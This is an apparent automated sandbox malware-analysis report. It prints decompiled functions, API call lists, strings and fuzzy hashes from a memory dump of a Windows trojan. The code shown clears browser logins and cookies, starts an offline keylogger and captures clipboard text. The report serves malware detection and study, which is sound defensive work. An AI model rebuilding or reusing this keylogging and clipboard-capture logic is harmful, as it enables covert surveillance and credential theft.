                                  				_v5 = _v5 & 0x00000000;
                                  				_v6 = _v6 & 0x00000000;
                                  				_v7 = _v7 & 0x00000000;
                                  				_v8 = _v8 & 0x00000000;
                                  				_t44 = 0;
                                  				do {
                                  					if(_v5 == 0) {
                                  						L2:
                                  						_v5 = E00407767();
                                  					}
                                  					if(_v6 == 0) {
                                  						_v6 = E0040751B();
                                  					}
                                  					if(_v8 == 0) {
                                  						_v8 = E0040728F();
                                  					}
                                  					if(_v7 == 0) {
                                  						_v7 = E004071CF();
                                  					}
                                  					if(_t44 == 0) {
                                  						_t44 = E0040710F();
                                  					}
                                  					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
                                  						Sleep(0x1388);
                                  					}
                                  					if(_v5 == 0) {
                                  						goto L2;
                                  					}
                                  				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				E00407A90("\n[Cleared browsers logins and cookies.]\n");
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
                                  				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
                                  				if( *0x41b9b0 != 0) {
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					E0040B829(0x80000001, _t40, "FR", 1);
                                  				}
                                  				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
                                  				return 0;
                                  			}
                                   Code line addresses: 0x004078be, 0x004078cd, 0x004078d4, 0x004078d6, 0x004078da, 0x004078de, 0x004078e2, 0x004078e6, 0x004078e8, 0x004078ec, 0x004078ee, 0x004078f3, 0x004078f3, 0x004078fa, 0x00407901, 0x00407901, 0x00407908, 0x0040790f, 0x0040790f, 0x00407916, 0x0040791d, 0x0040791d, 0x00407922, 0x00407929, 0x00407929, 0x0040792f, 0x0040794c, 0x0040794c, 0x00407952, 0x00000000, 0x00000000, 0x00407954, 0x0040797c, 0x00407982, 0x00407992, 0x004079a6, 0x004079ac, 0x004079bf, 0x004079cf, 0x004079db, 0x004079e9, 0x004079f5, 0x004079fa, 0x004079fd, 0x00407a09

                                  APIs
                                  • Sleep.KERNEL32 ref: 004078D4
                                  • Sleep.KERNEL32(00001388), ref: 0040794C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                    • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                    • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  • [INFO], xrefs: 004079A1
                                  • Cleared browsers logins and cookies., xrefs: 0040798D
                                  • [Cleared browsers logins and cookies.], xrefs: 00407977
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                  • API String ID: 3797260644-945983296
                                  • Opcode ID: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                  • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                  • Opcode Fuzzy Hash: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                  • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 26%
                                  			E00405180(void* __ecx, char _a4) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t14;
                                  				void* _t18;
                                  				void* _t19;
                                  				void* _t29;
                                  				void* _t32;
                                  				char* _t33;
                                  				void* _t36;
                                  
                                  				_t19 = __ecx;
                                  				 *((char*)(__ecx + 0x3c)) = 1;
                                  				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
                                  				E00405156(__ecx);
                                  				_t33 = "Offline Keylogger Started";
                                  				if( *0x41b154 != 0x32) {
                                  					_t36 = _t36 - 0x10;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                  					E00405DD3(__ecx);
                                  				}
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
                                  				E0041203B();
                                  				CreateThread(0, 0, E0040528A, _t19, 0, 0);
                                  				if( *_t19 == 0) {
                                  					CreateThread(0, 0, E0040526A, _t19, 0, 0);
                                  				}
                                  				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t14;
                                  			}
                                   Code line addresses: 0x00405185, 0x00405190, 0x00405194, 0x0040519c, 0x004051a8, 0x004051ad, 0x004051af, 0x004051b9, 0x004051c1, 0x004051c1, 0x004051d0, 0x004051e4, 0x004051ea, 0x00405204, 0x00405208, 0x00405214, 0x00405214, 0x00405220, 0x00405225, 0x0040522f

                                  APIs
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                  • CreateThread.KERNEL32(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                  • CreateThread.KERNEL32(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                  • CreateThread.KERNEL32(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                  • String ID: Offline Keylogger Started$[INFO]
                                  • API String ID: 2375278975-3749928830
                                  • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                  • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 31%
                                  			E00406C35(void* __ecx) {
                                  				char _v5;
                                  				char _v24;
                                  				char _v40;
                                  				char* _t13;
                                  				void* _t18;
                                  				void* _t34;
                                  
                                  				_t18 = __ecx;
                                  				if(( *0x41b8f8 & 0x00000001) == 0) {
                                  					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  					E00413E72(E00406CF4);
                                  				}
                                  				E00406BEF(_t18,  &_v24);
                                  				_t13 =  &_v24;
                                  				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
                                  				if(_t13 == 0) {
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
                                  					_t13 =  &_v24;
                                  					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
                                  					if(_t13 != 0) {
                                  						L00414176();
                                  						L00414170();
                                  						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t13;
                                  			}
                                   Code line addresses: 0x00406c45, 0x00406c4c, 0x00406c4e, 0x00406c5b, 0x00406c66, 0x00406c6b, 0x00406c72, 0x00406c7c, 0x00406c81, 0x00406c8b, 0x00406c93, 0x00406c99, 0x00406ca2, 0x00406cac, 0x00406cc4, 0x00406cce, 0x00406cd8, 0x00406ce0, 0x00406ce0, 0x00406cac, 0x00406ce9, 0x00406cf3

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                  Strings
                                  • [End of clipboard text], xrefs: 00406CB8
                                  • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                  • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                  • API String ID: 1191203583-3441917614
                                  • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                  • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				void* _v52;
                                  				char* _t25;
                                  				char* _t26;
                                  				intOrPtr _t35;
                                  				void* _t37;
                                  
                                  				_t37 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  				_t35 = _a4;
                                  				if(_a8 != 0) {
                                  					__eflags =  *0x41bcac; // 0x0
                                  					if(__eflags != 0) {
                                  						GetLocalTime( &_v20);
                                  						_t25 =  &_a11;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
                                  						_t26 =  &_v36;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
                                  						printf(_t26);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					}
                                  				} else {
                                  					 *((char*)(__ecx + 0x44)) = 1;
                                  				}
                                  				 *((char*)(_t37 + 0x38)) = 1;
                                  				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
                                  				CreateThread(0, 0, E004027A2, _t37, 0, 0);
                                  				return 1;
                                  			}

                                  Instruction addresses: 0x00402588 - 0x0040262f

                                  APIs
                                  • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                  • printf.MSVCRT ref: 004025F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                  • CreateThread.KERNEL32(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                  Strings
                                  • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                  • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                  • API String ID: 3715082883-586133315
                                  • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                  • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                  • String ID: alarm.wav
                                  • API String ID: 3304909635-4094641389
                                  • Opcode ID: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                  • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                  • Opcode Fuzzy Hash: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                  • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040AD91
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                    • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
